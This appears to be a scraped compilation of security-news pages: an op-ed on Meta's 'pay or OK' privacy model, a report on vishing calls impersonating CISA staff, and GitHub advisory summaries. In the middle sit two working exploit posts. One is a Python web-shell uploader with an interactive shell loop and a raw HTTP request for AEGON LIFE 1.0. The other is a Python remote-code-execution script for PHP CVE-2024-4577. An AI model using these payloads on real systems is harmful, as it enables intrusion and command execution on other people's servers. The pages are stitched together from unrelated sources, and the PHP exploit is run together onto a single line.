Meta's new subscription model points out the need for clearer and stricter regulations — ones that prioritize consumer privacy and control of personal data.

Source: Zoonar GmbH via Alamy Stock Photo

COMMENTARY

Meta recently offered its customers in the European Union the choice between paying for privacy or consenting to tracking, a model some people are calling "pay or OK." This sparked an investigation, since privacy in the EU is defined as a consumer right. With the bipartisan federal privacy bill in the US gaining ground to similarly make consumer privacy a right at the federal level, Meta's new model could come under even more fire if the company implements it here.

But what is "pay or OK," and why does it matter? 

**Understanding the Conflict**

Meta's subscription model violates the principle of freely given consent by forcing users to choose one of just two options: paying a fee or consenting to tracking for personalized advertising. It's essentially a false choice, because Meta is making money off users' data one way or another, either through the subscription or by selling their information. Numerous privacy and consumer rights proponents have already criticized the move as an attempt to circumvent the European Union's stringent data protection laws by coercing users to agree to data tracking. 

The new model also allows Meta to sidestep the broad demand from privacy advocates for all such software platforms and services to install opt-out mechanisms. Technically, on Meta's various sites, there is an opt-out mechanism, but this new model manipulates consent dynamics by introducing financial incentives to sway user choices. Users might believe that they are "giving consent," when in reality they can only either financially support the platform or surrender their privacy rights. Ironic, considering that, according to Meta, the whole point of the subscription is supposedly to protect user privacy.

History has already shown how little users can trust Big Tech companies like Meta to protect consumer data. For example, Meta has had several major breaches over the past few years and several lawsuits related to misuse of consumer data. Google and Microsoft have both experienced similar accusations. Naturally, the security and privacy lapses have caused privacy advocates to question: Are these the companies you should be paying to protect your data? The answer for a constantly increasing number of consumers is: No. 

**Steps for Consumer Protection**

The evidence is clear: Big Tech won't protect users' data. Consumers are looking for other ways to defend themselves from data theft, and fortunately, new technologies and privacy developments have started to make this a lot easier. 

For starters: Use privacy-focused browsers. Some examples include Brave, Tor, and Firefox, all of which are known for prioritizing data privacy. These browsers often come with built-in features to block trackers and advertisements, reduce digital fingerprinting, and ensure more secure browsing.

Next are virtual private networks (VPNs). VPNs encrypt Internet traffic, which prevents other third parties, even your Internet service provider, from monitoring users' online activities. A reliable VPN can also mask a user's IP address. Normally, advertisers and other third parties use your IP address to track your activity and create a profile that is unique to that address. A VPN prevents that tracking, which enhances anonymity on the Web. 

Third, users should view and adjust their social media privacy settings on a regular basis. Social media platforms frequently update their policies and settings. Users should review their settings to control who sees their information, which data third parties have access to, and how their information is used for advertising.

Fourth, I suggest users actively manage and regularly delete unnecessary personal data stored online. A simple Internet search will show you that your name, and possibly your address, phone number, and tons of other information, is readily available on data broker websites — thanks to companies like Meta selling them all that data. Look for ways to opt out of these platforms. Consider setting social media accounts to be private or deleting old accounts that are no longer active. 

Finally, stay informed on consumer rights and data protection laws like the General Data Protection Regulation (GDPR) in Europe or the California Consumer Privacy Act (CCPA) in the United States. These laws often grant users the right to access, correct, and delete personal data, along with the right to opt out of companies selling your info. Being informed lets users make educated decisions and take legal action if necessary.

**Final Thoughts**

Privacy regulators may or may not be able to counteract Meta's consent-or-pay ploy. But either way, the new subscription model points out the need for clearer and stricter regulations in the US, ones that prioritize consumer privacy and control of personal data rather than forcing users to choose between shelling out or giving up. Until then, consumers need to be aware of the privacy technologies, opt-out mechanisms, and choices that are readily available today.

**About the Author(s)**

CEO, Abine/DeleteMe

Rob Shavell is CEO of Abine/DeleteMe, The Online Privacy Company. Rob has been quoted as a privacy expert in the Wall Street Journal, New York Times, The Telegraph, NPR, ABC, NBC, and Fox. Rob is a vocal proponent of privacy legislation reform, including the California Privacy Rights Act (CPRA).

Why Trading Privacy for 'Free' Web Services Must End

The cybersecurity agency issued a warning not to agree to any payment requests and to alert law enforcement or CISA after being contacted.

Source: Brian Jackson via Alamy Stock Photo

The US Cybersecurity and Infrastructure Security Agency (CISA) issued an alert this week warning that malicious actors have been making phone calls claiming to be representatives from the organization, and making requests for cash, gift card, or cryptocurrency transfers.

"Impersonation scams are on the rise and often use the names and titles of government employees," CISA explained in the brief advisory. "As a reminder, CISA staff will never contact you with a request to wire money, cash, cryptocurrency, or use gift cards and will never instruct you to keep the discussion secret."

The CISA did not offer additional details as to whom might be perpetrating the voice phishing ("vishing") fraud attempts, but advised anyone who is contacted in such a scheme to deny the request for payment, make note of the phone number and hang up immediately.

Those contacted were also asked to report the incident to law enforcement and reach out to CISA by calling (844) SAY-CISA (844-729-2472).

The perpetrators might aim to fund further criminal activities or simply profit from the immediate financial returns of their deceitful tactics, says Ezra Graziano, director of federal accounts at Zimperium.

"Such scams can be orchestrated by organized cybercriminal groups or individual actors seeking to exploit people's trust in government agencies," he said. "This incident highlights the evolving tactics of cybercriminals, who are increasingly using sophisticated social engineering techniques to exploit trust in government agencies."

He added the fact that scammers are impersonating CISA employees underscores the urgency for individuals and organizations to be vigilant.

"It also reflects the broader trend of targeted phishing attacks where fraudsters aim to exploit the authority and credibility of well-known institutions," Graziano said.

Other government agencies impacted by impersonation scams include the FBI and its Internet Crime Complaint Center, which has been targeted as far back as 2018.

Beyond impersonation of government officials and agencies, malicious actors are also targeting brands by setting up scam sites aping those of legitimate businesses to sell counterfeit goods or process payments without sending the product.

These types of scams have cost consumers more than $2 billion since 2017, according to the US Federal Trade Commission (FTC).

**Education, Training Helps Prepare for Vishing**

Sean McNee, head of research for DomainTools, said the most important thing employers can do is educate employees about various types of scams, how they work, and how to recognize them.

"This includes understanding tactics used by scammers, such as impersonation, social engineering, and phishing," he says.

For instance, employees should be suspect of unsolicited calls or emails, verify the identity of unknown or new callers, and be wary of unusual requests for sensitive information.

He explains that phone-based scams work by creating a false sense of urgency to manipulate the receiver to take actions they normally wouldn’t take.

"Understanding this … helps reduce its effectiveness," McNee says.

Patrick Harr, CEO of SlashNext Email Security+, points out that impersonation scams have long been a tool of scammers whereby they impersonate high-value individuals, such as executives, CEOs, or other high-value targets and sometimes what can be perceived as scary agencies, such as the IRS. He predicts that scams like these will only increase with the weaponization of AI generated voice, video and text.

Thus, from Harr's perspective, any good cyber defense is a multi-layered defense against scams, phishing, business email companies and other socially engineered attacks.

"Firstly, ensure businesses have multifactor authentication (MFA), password change control, AI based email and messaging security and detection and monitoring in place," he cautions. "Companies, organizations, and individuals must employ AI themselves to fight these scams, otherwise we will see continued success."

Don't miss "Anatomy of a Data Breach: What to Do if It Happens to You," a free Dark Reading virtual event scheduled for June 20! Speakers include Verizon's Alex Pinto, execs from Snowflake, pharma giant GSK, Salesforce, and more — register today!

**About the Author(s)**

Nathan Eddy is a freelance journalist and award-winning documentary filmmaker specializing in IT security, autonomous vehicle technology, customer experience technology, and architecture and urban planning. A graduate of Northwestern University’s Medill School of Journalism, Nathan currently lives in Berlin, Germany.

Widespread Vishing Effort Impersonates CISA Staff

AEGON LIFE version 1.0 suffers from an unauthenticated remote code execution vulnerability.

# Exploit Title:  Life Insurance Management System- Unauthenticated Remote Code Execution (RCE)  
# Exploit Author: Aslam Anwar Mahimkar  
# Date: 18-05-2024  
# Category: Web application  
# Vendor Homepage: https://projectworlds.in/  
# Software Link: https://projectworlds.in/life-insurance-management-system-in-php/  
# Version: AEGON LIFE v1.0  
# Tested on: Linux  
# CVE: CVE-2024-36598

# Description:  
----------------

-An arbitrary file upload vulnerability in Aegon Life v1.0 allows attackers to execute arbitrary code via uploading a crafted PHP file by adding image/gif magic bytes in payload.

-In insertClient.php fileToUpload is only checking for image file but not checking for extensions, also header.php is not properly handling the redirection hence allowing Unauthenticated redirect.

# Payload:  
------------------

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

# RCE via executing exploit:  
---------------------------------------

    # Step : run the exploit in python with this command: python3 shell.py  http://localhost/lims/  
    # will lead to RCE shell.

  POC  
-------------------

import argparse  
import random  
import requests  
import string  
import sys

parser = argparse.ArgumentParser()  
parser.add_argument('url', action='store', help='The URL of the target.')  
args = parser.parse_args()

url = args.url.rstrip('/')  
random_file = ''.join(random.choice(string.ascii_letters + string.digits) for i in range(10))

payload = "GIF89a;'<?php echo shell_exec($_GET[\'cmd\']); ?>'"

file = {'fileToUpload': (random_file + '.php', payload, 'text/php')}  
print('> Attempting to upload PHP web shell...')  
r = requests.post(url + '/insertClient.php', files=file, data={'agent_id':''}, verify=False)  
print('> Verifying shell upload...')  
r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':'echo ' + random_file}, verify=False)

if random_file in r.text:  
    print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php')  
    print('> Example command usage: ' + url + '/uploads/' + random_file + '.php?cmd=whoami')  
    launch_shell = str(input('> Do you wish to launch a shell here? (y/n): '))  
    if launch_shell.lower() == 'y':  
        while True:  
            cmd = str(input('RCE $ '))  
            if cmd == 'exit':  
                sys.exit(0)  
            r = requests.get(url + '/uploads/' + random_file + '.php', params={'cmd':cmd}, verify=False)  
            print(r.text)  
else:  
    if r.status_code == 200:  
        print('> Web shell uploaded to ' + url + '/uploads/' + random_file + '.php, however a simple command check failed to execute. Perhaps shell_exec is disabled? Try changing the payload.')  
    else:  
        print('> Web shell failed to upload! The web server may not have write permissions.')

---------------------------------------------------------------------------------------------------------------------------

### Can also performed manually.

Payload:  
--------------

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

# Attack Vectors:  
-------------------------

After uploading malicious image can access it to get the shell

http://localhost/lims/uploads/shell2.gif.php?cmd=id

Burp Suit Request  
-----------------------------

POST /lims/insertClient.php HTTP/1.1  
Host: localhost  
Content-Length: 2197  
Cache-Control: max-age=0  
sec-ch-ua:   
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: ""  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary5plGALZGPOOdBlF0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/lims/addClient.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_id"

1716015032

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="client_password"

Password

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="name"

Test

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="fileToUpload"; filename="shell2.gif.php"  
Content-Type: application/x-php

GIF89a;  
<?php  
echo"<pre>";  
passthru($_GET['cmd']);  
echo"<pre>";  
?>

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="sex"

Male

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="birth_date"

1/1/1988

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="maritial_status"

M

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="phone"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="address"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="policy_id"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="agent_id"

Agent007

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_id"

1716015032-275794639

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_name"

Test1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_sex"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_birth_date"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_nid"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_relationship"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="priority"

1

------WebKitFormBoundary5plGALZGPOOdBlF0  
Content-Disposition: form-data; name="nominee_phone"

1  
------WebKitFormBoundary5plGALZGPOOdBlF0

AEGON LIFE 1.0 Remote Code Execution

PHP versions prior to 8.3.8 suffer from a remote code execution vulnerability.

    # Exploit Title: PHP Windows Remote Code Execution (Unauthenticated)# Exploit Author: Yesith Alvarez# Vendor Homepage: https://www.php.net/downloads.php# Version: PHP 8.3,* < 8.3.8,  8.2.*<8.2.20, 8.1.*, 8.1.29# CVE : CVE-2024-4577from requests import Request, Sessionimport sysimport jsondef title():    print('''       _______      ________    ___   ___ ___  _  _          _  _   _____ ______ ______   / ____\ \    / /  ____|  |__ \ / _ \__ \| || |        | || | | ____|____  |____  | | |     \ \  / /| |__ ______ ) | | | | ) | || |_ ______| || |_| |__     / /    / /  | |      \ \/ / |  __|______/ /| | | |/ /|__   _|______|__   _|___ \   / /    / /   | |____   \  /  | |____    / /_| |_| / /_   | |           | |  ___) | / /    / /     \_____|   \/   |______|  |____|\___/____|  |_|           |_| |____/ /_/    /_/                                                                                                                                                                                                                                                                                                                  Author: Yesith AlvarezGithub: https://github.com/yealvarezLinkedin: https://www.linkedin.com/in/pentester-ethicalhacker/Code improvements: https://github.com/yealvarez/CVE/blob/main/CVE-2024-4577/exploit.py    ''')   def exploit(url, command):           payloads = {        '<?php echo "vulnerable"; ?>',        '<?php echo shell_exec("'+command+'"); ?>'     }        headers = {    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0',    'Content-Type': 'application/x-www-form-urlencoded'}    s = Session()    for payload in payloads:        url = url + "/?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input"        req = Request('POST', url, data=payload, headers=headers)        prepped = req.prepare()        del prepped.headers['Content-Type']        resp = s.send(prepped,        verify=False,        timeout=15)        #print(prepped.headers)        #print(url)        #print(resp.headers)               #print(payload)        print(resp.status_code)        print(resp.text)if __name__ == '__main__':    title()    if(len(sys.argv) < 2):        print('[+] USAGE: python3 %s https://<target_url> <command>\n'%(sys.argv[0]))        print('[+] USAGE: python3 %s https://192.168.0.10\n dir'%(sys.argv[0]))                exit(0)    else:        exploit(sys.argv[1],sys.argv[2])

PHP Remote Code Execution

Users with "User:edit" and "Self:api" permissions can promote or demote themselves or other users by performing changes to the group's memberships via API call.This issue affects snipe-it: from v4.6.17 through v6.4.1.

**Snipe-IT allows users to promote or demote themselves or other users**

High severity GitHub Reviewed Published Jun 14, 2024 to the GitHub Advisory Database • Updated Jun 17, 2024

GHSA-544r-fc65-v832: Snipe-IT allows users to promote or demote themselves or other users

Mattermost Desktop App versions <=5.7.0 fail to disable certain Electron debug flags which allows for bypassing TCC restrictions on macOS.

**Mattermost Desktop App allows for bypassing TCC restrictions on macOS**

Low severity GitHub Reviewed Published Jun 14, 2024 to the GitHub Advisory Database • Updated Jun 17, 2024

GHSA-xgqm-wp7w-mgg2: Mattermost Desktop App allows for bypassing TCC restrictions on macOS

Mattermost Desktop App versions <=5.7.0 fail to correctly prompt for permission when opening external URLs which allows a remote attacker to force a victim over the Internet to run arbitrary programs on the victim's system via custom URI schemes.

**Mattermost Desktop App Remote Code Execution**

Moderate severity GitHub Reviewed Published Jun 14, 2024 to the GitHub Advisory Database • Updated Jun 17, 2024

GHSA-hvxg-77mg-vrvp: Mattermost Desktop App Remote Code Execution

Use of Web Browser Cache Containing Sensitive Information vulnerability in Apache Airflow. 

Airflow did not return "Cache-Control" header for dynamic content, which in case of some browsers could result in potentially storing sensitive data in local cache of the browser.

This issue affects Apache Airflow: before 2.9.2.

Users are recommended to upgrade to version 2.9.2, which fixes the issue.



**Apache Airflow does not return the "Cache-Control" header for dynamic content**

Low severity GitHub Reviewed Published Jun 14, 2024 to the GitHub Advisory Database • Updated Jun 17, 2024

GHSA-9xpj-62mm-24h2: Apache Airflow does not return the "Cache-Control" header for dynamic content

An issue in AdGuardHome v0.93 to latest allows unprivileged attackers to escalate privileges via overwriting the AdGuardHome binary.

**AdGuardHome privilege escalation vulnerability**

High severity GitHub Reviewed Published Jun 13, 2024 to the GitHub Advisory Database • Updated Jun 13, 2024

GHSA-7jp9-vgmq-c8r5: AdGuardHome privilege escalation vulnerability

### Summary
Bunch of vulnerabilities found in k8sGPT.  Fixed in release https://github.com/k8sgpt-ai/k8sgpt/releases/tag/v0.3.33

**Vulnerabilities with the k8sGPT**

High severity GitHub Reviewed Published Jun 13, 2024 in k8sgpt-ai/k8sgpt • Updated Jun 13, 2024

Tag

#git